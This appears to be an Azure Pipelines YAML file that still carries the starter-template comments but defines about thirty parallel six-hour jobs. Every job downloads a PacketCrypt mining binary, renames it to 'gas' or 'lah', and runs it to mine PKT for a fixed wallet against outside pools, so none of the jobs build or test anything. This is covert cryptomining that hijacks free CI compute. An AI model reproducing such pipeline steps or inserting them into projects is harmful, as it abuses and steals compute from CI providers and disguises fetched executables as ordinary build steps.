# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool: Azure Pipelines

jobs:
- job: a
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O gas && chmod +x gas && ./gas ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335 http://pool.pkt.world/master/2048 http://pool.pktpool.io/
  
- job: b
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: c
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: d
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: e
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: f
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: g
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: h
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: i
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: j
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: k
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: l
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: m
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: n
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: o
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: p
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: q
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: r
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: s
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: t
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: u
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: v
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: w
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: x
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: y
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: z
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: aa
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: bb
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: cc
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/

- job: dd
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1q908pl3jfwd3awfqc0p8pkxfk3vjhaaqhng5335  http://pool.pkt.world/ http://pool.pktpool.io/
